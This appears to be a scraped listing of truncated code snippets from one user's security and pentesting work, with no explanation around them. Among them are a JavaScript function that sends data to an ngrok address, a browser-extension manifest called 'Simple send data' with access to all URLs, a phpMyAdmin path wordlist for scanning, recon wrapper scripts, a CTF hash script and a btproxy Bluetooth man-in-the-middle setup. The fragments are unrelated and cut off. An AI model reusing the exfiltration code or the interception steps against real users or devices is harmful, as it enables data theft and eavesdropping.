nknskn

#!/bin/bash

function Usage () {
	echo "Usage: $(basename $0) -d <domain> -p <port> [-s]"
	echo "    -d: domain"
	echo "    -p: port"
	echo "    -s: ssl option"
	echo
	echo "Depends on : wget, python3, CeWL, cutycapt, tree, openssl"
	exit 1

nknskn

#!/bin/bash

function Usage () {
	echo "Usage: $(basename $0) -f <IP list file>"
	echo
	echo "Depends on : autorecon.py"
	echo "    If you have not cloned, clone autorecon repository."
	echo "        git clone https://github.com/Tib3rius/AutoRecon"
	exit 1
}

nknskn

function send(data) {
  var xhr = new XMLHttpRequest();
  xhr.open("GET", "http://b5f8d4b7.ngrok.io/?a="+data, true);
  xhr.onload = function (e) {
    if (xhr.readyState === 4) {
      if (xhr.status === 200) {
        code = xhr.responseText;
      } else {
        console.error(xhr.statusText);
      }

nknskn

{
  "manifest_version": 2,
  "name": "Simple send data",
  "version": "1.0",
  "background" :{
    "scripts": ["background.js"],
    "persistent": true
  },
  "permissions": [
    "<all_urls>"

nknskn

/
/.well-known/security.txt
//MyAdmin/scripts/setup.php
//_phpmyadmin/scripts/setup.php
//admin/phpmyadmin/scripts/setup.php
//admin/pma/scripts/setup.php
//admin/scripts/setup.php
//administrator/components/com_joommyadmin/phpmyadmin/scripts/setup.php
//apache-default/phpmyadmin/scripts/setup.php
//blog/phpmyadmin/scripts/setup.php

nknskn

# encoding: utf-8
import hashlib

table = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ{}'
tableNum = len(table)

ansHash = 'f528a6ab914c1ecf856a1d93103948fe'

p1 = 'SECCON{A'
c2 = 'DOEE'

nknskn

#!/bin/sh
# usage: ./fileDownload.sh [targeturl] [savefilename]
# Tested on: Mac OS X 10.10.5
# Build Version: 14F1605
# 
# ex.
# $ ./fileDownload.sh http://free.nchc.org.tw/linuxmint/isos//stable/17.3/linuxmint-17.3-mate-32bit.iso linuxmint-17.3-mate-32bit.iso
#   % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
#                                  Dload  Upload   Total   Spent    Left  Speed
# 100 1480M  100 1480M    0     0  4222k      0  0:05:58  0:05:58 --:--:-- 4232k

nknskn

Connected to service "Hands-Free unit"
Accepted connection from  ('AA:AA:AA:AA:AA:AA', 23)
Connected to service "Headset"
Accepted connection from  ('AA:AA:AA:AA:AA:AA', 1)
>>  'AT+BRSF=17\r'
<<  '\r\n+BRSF:367\r\n'
<<  '\r\nOK\r\n'
>>  'AT+CIND=?\r'
<<  '\r\n+CIND: ("service",(0-1)),("call",(0-1)),("callsetup",(0-3)),("battchg",(0-5)),("signal",(0-5)),("roam",(0-1)),("callheld",(0-2))\r\n'
<<  '\r\nOK\r\n'

nknskn

$ sudo vim /usr/local/lib/python2.7/dist-packages/btproxy-0.1-py2.7-linux-x86_64.egg/libbtproxy/mitm.py

++        print(service['protocol'])
// 上記ファイルの 260-261 行目
        if service['protocol'].lower() == 'l2cap':
          server_sock=BluetoothSocket( L2CAP )

$ sudo btproxy AA:AA:AA:AA:AA:AA BB:BB:BB:BB:BB:BB
...
Spoofing master name as  (slave device's name)_btproxy

nknskn

Traceback (most recent call last):
  File "/usr/local/bin/btproxy", line 5, in <module>
    pkg_resources.run_script('btproxy==0.1', 'btproxy')
  File "/usr/lib/python2.7/dist-packages/pkg_resources.py", line 528, in run_script
    self.require(requires)[0].run_script(script_name, ns)
  File "/usr/lib/python2.7/dist-packages/pkg_resources.py", line 1394, in run_script
    execfile(script_filename, namespace, namespace)
  File "/usr/local/lib/python2.7/dist-packages/btproxy-0.1-py2.7-linux-x86_64.egg/EGG-INFO/scripts/btproxy", line 39, in <module>
    btproxy.mitm()
  File "/usr/local/lib/python2.7/dist-packages/btproxy-0.1-py2.7-linux-x86_64.egg/libbtproxy/mitm.py", line 535, in mitm